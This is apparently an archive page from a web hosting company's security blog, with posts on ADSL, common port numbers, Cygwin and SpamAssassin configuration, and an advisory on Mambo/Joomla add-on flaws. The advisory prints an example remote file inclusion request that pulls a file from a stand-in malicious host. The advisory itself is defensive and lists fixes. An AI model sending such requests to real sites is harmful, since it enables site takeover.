BLOG HOME -  UK WEB HOSTING -  PHP MYSQL HOSTING -  RESELLER HOSTING -  eUKhost FORUMS -  VPS HOSTING

Archive for Internet Security

ADSL

ADSL - Asymmetric Digital Subscriber Line is a type of DSL. It works by splitting your existing telephone line signal into two, one for voice and the other for data. ADSL technology can work at up to 8Mbps download. The most popular services in the UK at the moment are running at speeds of 512Kbps (approx. 9 times faster than a modem), although speeds of up to 2Mbps can be obtained. Upload speeds are 256Kbps on all products and hence this is why it is “asymmetric”, because the download speed is different to the upload speed.

ADSL allows transmission of more & faster data over existing copper telephone lines. ADSL is an effective way for providing of Internet access in various situation, without the complications of configuring and operating a modem. ADSL is quick to connect, it is faster, its shares a phone line, there is no need of second phone line & it is far more cost effective.

Comments Bookmark on del.icio.us

Some Important Ports

Following is a list of useful port numbers.

HTTP 80
HTTPS 443
SMTP 25
SMTP (SSL) 465
FTP 21
MySQL 3306
PostgreSQL 5432
SSH 22
DHCP 67, 68
DNS 53
cPanel 2082
cPanel (SSL) 2083
WHM 2086
WHM (SSL) 2087
Webmail 2095
Webmail (SSL) 2096
POP3 110
POP3 (SSL) 995
IMAP 143
IMAP (SSL) 993
plesk 8443
virtuozzo 4643

Comments Bookmark on del.icio.us

Cygwin

Cygwin is a Linux-like environment for Windows. It consists of two parts:

* A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API functionality.
* A collection of tools which provide Linux look and feel.

The Cygwin DLL works with all non-beta, non “release candidate”, ix86 32 bit versions of Windows since Windows 95, with the exception of Windows CE.

The Cygwin tools are ports of the popular GNU development tools for Microsoft Windows. Cygwin can be expected to run on all modern 32 bit versions of Windows, except Windows CE. This includes Windows 95/98/ME/NT/2000/XP/2003 and the WOW64 32 bit environment on released 64 bit versions of Windows. Parts are GNU software (gcc, gas, ld, etc…), parts are covered by the standard X11 license, some of it is public domain, some of it was written by Cygnus and placed under the GPL.

Site: http://cygwin.com

Comments Bookmark on del.icio.us

SpamAssassin

What is spamassassin ?
———————-
The SpamAssassin system is software for analyzing email messages,
determining how likely they are to be spam, and reporting its conclusions.
It is a rule-based system that compares different parts of email messages
with a large set of rules. A message with a high enough score is reported to
be spam.

How it works ? : -
—————

–> There are several ways that SpamAssassin makes up its mind about a
message:
–> The message headers can be checked for consistency and adherence to
Internet standards (e.g., is the date formatted properly?).
–> The headers and body can be checked for phrases or message elements
commonly found in spam (e.g., “MAKE MONEY FAST” or instructions on how to be
removed from future mailings)-in several languages.
–> The headers and body can be looked up in several online databases that
track message checksums of verified spam messages.
–> The sending system’s IP address can be looked up in several online lists
of sites that have been used by spammers or are otherwise suspicious.
–> Specific addresses, hosts, or domains can be blacklisted or whitelisted.
A whitelist can be automatically constructed based on the sender’s past
history of messages.
–> SpamAssassin can be trained to recognize the types of spam that you
receive by learning from a set of messages that you consider spam and a set
that you consider non-spam. (SpamAssassin and the spam-filtering community
often refer to non-spam messages as ham. )
–> The sending system’s IP address can be compared to the sender’s domain
name using the Sender Policy Framework (SPF) protocol (http://spf.pobox.com)
to determine if that system is permitted to send messages from users at that
domain. This feature requires SpamAssassin 3.0.
–> SpamAssassin can privilege senders who are willing to expend some extra
computational power in the form of Hashcash (http://www.hashcash.org).
Spammers cannot do these computations and still send out huge amounts of
mail rapidly. This feature requires SpamAssassin 3.0.

Most of SpamAssassin’s behavior is controlled through a systemwide
configuration file and a set of per-user configuration files. The per-user
configuration can also be stored in an SQL database.

How to Configure it ? : -
——————-

You can easily customize how SpamAssassin tags and identifies spam by
creating a spamassassin/user_prefs file. You can customize the number of
“spam points” required to identify a message as spam, create new rules, and
re-weight existing rules. Here is a sample user_prefs file. It raises the
threshold for identifying spam from 5 to 6, disables including spam warnings
in the subject and body, reweights a known rule, and adds several blacklist,
whitelist, and header rules.

Listing 1. A typical user_prefs configuration file

================================================================

#How many hits before a mail is considered spam?
required_hits 6

#Don’t mangle the messages so badly
rewrite_subject 0
use_terse_report 1

#whitelist and blacklist
whitelist_from *@www.eukhost.com
blacklist_from annoying-person@xyz.com

#reweight an existing rule
score BASE64_ENC_TEXT 3

#add some new rules
header KNOWN_LIST List-Id =~ /a-mailing-list-i-like/
score KNOWN_LIST -3

body EVITE /This invitation was sent to you by .* using Evite/
describe EVITE Looks like an eVite
score EVITE -3

================================================================

At heart, SpamAssassin is a set of modules written in the Perl programming
language, along with a Perl script that accepts a message on standard input
and checks it using the modules. For higher-performance applications,
SpamAssassin also includes a daemonized version of the spam-checker and a
client program in C that can accept a message on standard input and check it
with the daemon.

Comments (13) Bookmark on del.icio.us

Mambo and Joomla Vulnerabilities

Currently, there is a high vulnerability risk for addon components to Mambo and Joomla due to our servers having register_globals set to ON in the global php.ini This is being exploited to run the following type of url string to upload malicious files onto an account:

GET
/components/com_component/componentfile.php?mosConfig_absolute_path=
http://malicious.com/maliciousfile.txt

Where component is the component such as com_smf or com_extcalendar and componentfile.php is the file like smf.php or extcalendar.php (these are just examples, many Mambo Hosting and Joomla Hosting addon components have this security hole), and where malicious.com is any site where the hacker has his crummy file andmaliciousfile.txt is that file.

The manner to fix this issue is the following:

1. Create a php.ini on the account at /home/user/public_html (user here indicated your cPanel username). You can reach this location if you log into cPanel, click on File Manager, then click on the folder icon next to public_html folder. Inside public_html, simply click “Create File” link, then in the upper right, name the file php.ini, simply add the 2 lines in Step #2 to that file.

2. In the php.ini file put:

register_globals = Off
allow_url_fopen = Off

3. In public_html folder, open .htaccess file by clicking on the file’s name in File Manager and selecting “Edit File” in the upper right hand corner list of links, then add this (change user to your cPanel username in the /home/user/public_html path):

suPHP_ConfigPath /home/user/public_html

order allow,deny
deny from all

Comments Bookmark on del.icio.us

SpamAssassin

The Spam Assassin is software for scanning email messages & determining their probability of being a spam, and reporting its outcome. The software compares different parts of email messages with a large set of rules. Each rule adds or removes points from a message’s spam total score. A message with a substantial enough score is labeled to be spam.
SpamAssassin is an e-mail spam filtering system that sits side by side with account with us to help block, mark or filter out mail you don’t want.
Spam Assassin can be activated from Cpanel, under the “Mail” box section. Here you will know if your Spam Assassin is currently enabled or disabled. Clicking the boxes to enable or disable Spam Assassin is how you can turn it on or off. To configure the Spam Assassin settings click the button that reads: “Configure Spam Assassin (required to rewrite subjects)”
Spam Assassin lists comprehensive information for your knowledge, some of these aspects are:

Required hits - The number of e-mails received before marked as spam.
Rewrite subject - The subject conveys Spam Assassin if it should rewrite your subject line or not as you define.
Subject tag - What the spam is marked with in the subject line. (Usually ***SPAM*** or something else that could be picked up by your own mail filters on your mail client of choice)
blacklist from - An e-mail address you definitely want to be marked as spam. (you could also use *@something.com to get every email from that address filtered)
whitelist_from - An e-mail address you definitely do NOT want to be marked as spam. (you could also use *@something.com to get every email from that address NOT filtered)

Once you’re done, just hit save and whatever you defined on the earlier page will now be in effect. If you picked to rewrite the subject, then you could now go into your mail client and write a new “rule” that would filter all mail with “***SPAM***” to go into a SPAM folder so that you could check it from time to time making sure you did not get any false positives.

You can turn your spam box enable and disable from the same page as Spam Assassin. It’s just that easy! With the recent upgrades to Cpanel, the Webhosting technical support team has been taking care & implementing the latest Spam Assassin versions. Spam assassin for Outlook is also available.

Comments Bookmark on del.icio.us

« Previous entries · Next entries »